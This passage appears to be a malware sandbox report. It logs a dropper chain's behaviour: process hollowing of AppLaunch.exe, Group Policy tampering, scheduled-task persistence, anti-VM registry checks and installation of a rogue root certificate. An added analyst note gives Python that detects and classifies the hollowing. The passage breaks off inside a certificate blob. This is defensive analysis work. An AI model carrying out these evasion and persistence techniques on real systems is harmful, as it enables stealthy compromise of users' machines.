N/A api.myip.com N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.myip.com N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A ipinfo.io N/A N/A
N/A api64.ipify.org N/A N/A
N/A api64.ipify.org N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.2ip.ua N/A N/A
N/A api.myip.com N/A N/A
N/A api.myip.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
File opened for modification C:\Windows\SysWOW64\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\Minor Policy\a8aMLCY7UqQ6j_EBBntQ5onH.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 1076 set thread context of 2516 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 2276 set thread context of 2256 N/A C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2456 set thread context of 1708 N/A C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1596 set thread context of 1620 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2lv8023.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1948 set thread context of 3040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Gh68ms.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2152 set thread context of 2764 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4nE240CO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 2352 set thread context of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Cy9OS5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 1796 set thread context of 2824 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe
PID 3364 set thread context of 3484 N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe
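Analyst note (added example, not from the report): every row above whose target is AppLaunch.exe is process hollowing (ATT&CK T1055.012). The loader starts the Microsoft-signed .NET host suspended, replaces its image with the payload and uses SetThreadContext to point the primary thread at the new entry point, so the payload runs under a trusted image name. The rows where source and target are the same image (_Axw7GGd2Fy7GTHeEDtFtPCq.exe twice, toolspub2.exe once) are the self-injecting variant: the sample spawns a copy of itself and rewrites that. This changes how the rest of the report reads: the SCSI registry enumeration attributed to AppLaunch.exe in the "Checks SCSI registry key(s)" table below is the injected payload's anti-VM check, not behaviour of the .NET binary. The Python below is this editor's code: it parses the rows, separates the two patterns and collects the PIDs whose later events belong to the payload. The host list is an assumed starter set, not a sandbox list.

```python
import re
from collections import defaultdict

# SetThreadContext rows copied from this report's table (constructed sample
# input; the "PID x set thread context of y" wording is the sandbox's).
SAMPLE = [
    r'PID 1076 set thread context of 2516 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe',
    r'PID 2276 set thread context of 2256 N/A C:\Users\Admin\Pictures\Minor Policy\ch5c8B5ZdA4rJTdsnDNjoJVN.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe',
    r'PID 2456 set thread context of 1708 N/A C:\Users\Admin\Pictures\Minor Policy\8of3DRmQjWCjBhE2NNvN6ur1.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe',
    r'PID 1596 set thread context of 1620 N/A C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\2lv8023.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe',
    r'PID 1948 set thread context of 3040 N/A C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\3Gh68ms.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe',
    r'PID 2152 set thread context of 2764 N/A C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\4nE240CO.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe',
    r'PID 2352 set thread context of 2752 N/A C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\5Cy9OS5.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe',
    r'PID 1796 set thread context of 2824 N/A C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe C:\Users\Admin\Pictures\Minor Policy\_Axw7GGd2Fy7GTHeEDtFtPCq.exe',
    r'PID 3364 set thread context of 3484 N/A C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe',
]

STC_RE = re.compile(r'^PID (\d+) set thread context of (\d+) N/A (C:\\.+?) (C:\\.+?)$')

# Signed Microsoft binaries that commodity .NET loaders commonly hollow
# (assumption: a starter list; extend it from your own telemetry).
HOLLOW_HOSTS = {
    "applaunch.exe", "regasm.exe", "regsvcs.exe", "msbuild.exe",
    "installutil.exe", "aspnet_compiler.exe", "vbc.exe", "csc.exe",
}


def basename(path: str) -> str:
    return path.rpartition("\\")[2]


def classify(line: str):
    """One SetThreadContext row -> event dict, or None if the row is not one."""
    m = STC_RE.match(line)
    if not m:
        return None
    src_pid, dst_pid, src, dst = m.groups()
    if src == dst:
        kind = "self-injection"          # suspended copy of the same image is rewritten
    elif basename(dst).lower() in HOLLOW_HOSTS:
        kind = "hollowing-signed-host"   # payload hidden behind a Microsoft-signed image
    else:
        kind = "cross-process"           # anything else still deserves a look
    return {"kind": kind, "src_pid": int(src_pid), "dst_pid": int(dst_pid), "src": src, "dst": dst}


def summarize(lines):
    """Return (events, {host image: [loader images]}, PIDs now running payload code)."""
    events = [e for e in map(classify, lines) if e]
    by_host = defaultdict(list)
    for e in events:
        if e["kind"] == "hollowing-signed-host":
            by_host[basename(e["dst"])].append(basename(e["src"]))
    # Any later sandbox event from these PIDs is the payload's, not the host image's.
    payload_pids = {e["dst_pid"] for e in events}
    return events, dict(by_host), payload_pids


if __name__ == "__main__":
    events, by_host, payload_pids = summarize(SAMPLE)
    for host, loaders in by_host.items():
        print(f"{host} hollowed by {len(loaders)} distinct loaders: {', '.join(loaders)}")
    for e in events:
        if e["kind"] == "self-injection":
            print(f"self-injection: {basename(e['src'])} (pid {e['src_pid']} -> {e['dst_pid']})")
    print("attribute later events from PIDs", sorted(payload_pids), "to the payload")
```

Six distinct loaders (the four IXP-stage payloads 2lv8023, 3Gh68ms, 4nE240CO, 5Cy9OS5 and two of the Pictures\Minor Policy drops) all hollow the same AppLaunch.exe image, which is why a process tree shows several unrelated-looking AppLaunch.exe children with no command line. On a live host the same signal comes from Sysmon Event ID 25 (process tampering) on AppLaunch.exe, or a Sysmon Event ID 10 process access from a non-Microsoft image to a freshly created, still-suspended AppLaunch.exe.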

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\1000356001\toolspub2.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Pictures\Minor Policy\qDJxOF88P5b31X9nYbNzcZPp.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Users\Admin\Pictures\Minor Policy\RxOQCm7grqMZ61Vr_46oGvts.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{64E60BC1-6CBE-11EE-AF5C-C6D3BD361474} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IETld\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\BrowserEmulation\LowMic C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\CompatibilityFlags = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DOMStorage C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery\AdminActive = "1" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\PageSetup C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Toolbar\WebBrowser C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{652FBEF1-6CBE-11EE-AF5C-C6D3BD361474} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\Window_Placement = 2c0000000200000003000000ffffffffffffffffffffffffffffffff3d0000003d000000c3040000a2020000 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Zoom C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive\{654801E1-6CBE-11EE-AF5C-C6D3BD361474} = "0" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Recovery\PendingRecovery C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\GPU C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\LowRegistry\DontShowMeThisDialogAgain C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\IntelliForms C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3750544865-3773649541-1858556521-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 C:\Users\Admin\Pictures\Minor Policy\dmLR0Y_m8IWj4ctFaNTqCtNr.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\785B0CD2BDDEE7CBA2C272AC3EC9DCBC8835C3C4\Blob = 0f0000000100000020000000ffda0203811f8b2cca225df80e814442949df70618555e614bb267a89cc9e71b030000000100000014000000785b0cd2bddee7cba2c272ac3ec9dcbc8835c3c42000000001000000f9020000308202f5308201dda003020102021028cac2390d446838dc905f237a8b07ad300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3233303932383139303030305a170d3238303932363139303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100bc57e9b9584988333103e4819b955a2ef7494ac3af4912d07d59b529387c748691bb827c637ff9950773840ee2728a7a8987c127952251ac749c97a683710b536aa845d6f6cf82384efcd239ae294ca0dc6e54de02af89d408562d41c95fdf24f60033856f5d8312254243f80618eb55ae31612f8a4e9d61acfeb3476316afe4ce20a3629d3ef8fdf8c01c66eca11f1e36b9d5fbebfaa1d07068367e1138249b220779db32ab6b2959517493bd5c7a0f2f94eb1f3e170ef2df4d2aea496d49c12b272df7f10419a9b8c9522553134b3d8ca0b5a2e5366d3c40bdd85d56425329ab85694a7e04e4e8a413d8bc44009e90011c45b8cdc380dcdd55885e13ff3ec10203010001a3453043300e0603551d0f0101ff04040302010630120603551d130101ff040830060101ff020101301d0603551d0e041604143c14b0c4f79ee701ce7a068006a734b505c19e88300d06092a864886f70d01010b0500038201010015e6471828cc1ad1330221f32e5d6d2f9e51edb41cb38e1f9a52d26af2a229342cd18b8a3f23e7c26a546276ffd1d09ae010447dc52d62a7e3f879b2f8e1b9df10c5695b7e4c47172142f599df8ae70ef357d1b1e9eba9d385a1f5eae798b035e0e8fbd753c9c43e3c232e935f4de301f46a2b1aece9eca64686b46ea7e69f8e538e0a5e5b759e4c9eafdae6ba2f57aa66eff15b28323e30e67cfd145c60c2940bd927247dc5a5c09954901f8215cb530909fc8c4c60b03daae8e23d62dcd80beae9eaf18dea862c7d000b86eda4dc7b2197aa53bdc96c0c37f5c90e1b07d343cc468887683123d95a054e1174ea018a61d88865d66c833702722508d7d5a02d C:\Users\Admin\AppData\Local\Temp\Setup.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\785B0CD2BDDEE7CBA2C272AC3EC9DCBC8835C3C4\Blob = 190000000100000010000000aad8adf39bae31f746c3facd72799f830f0000000100000020000000ffda0203811f8b2cca225df80e814442949df70618555e614bb267a89cc9e71b030000000100000014000000785b0cd2bddee7cba2c272ac3ec9dcbc8835c3c41400000001000000140000003c14b0c4f79ee701ce7a068006a734b505c19e882000000001000000f9020000308202f5308201dda003020102021028cac2390d446838dc905f237a8b07ad300d06092a864886f70d01010b050030133111300f06035504031308436c6f75644e6574301e170d3233303932383139303030305a170d3238303932363139303030305a30133111300f06035504031308436c6f75644e657430820122300d06092a864886f70d01010105000382010f003082010a0282010100bc57e9b9584988333103e4819b955a2ef7494ac3af4912d07d59b529387c748691bb827c637ff9950773840ee2728a7a8987c127952251ac749c97a683710b536aa845d6f6cf82384efcd239ae294ca0dc6e54de02af89d408562d41c95fdf24f60033856f5d8312254243f80618eb55ae31612f8a4e9d61acfeb3476316afe4ce20a3629d3ef8fdf8c01c66eca11f1e36b9d5fbebfaa1d07068367e1138249b220779db32ab6b2959517493bd5c7a0f2f94eb1f3e170ef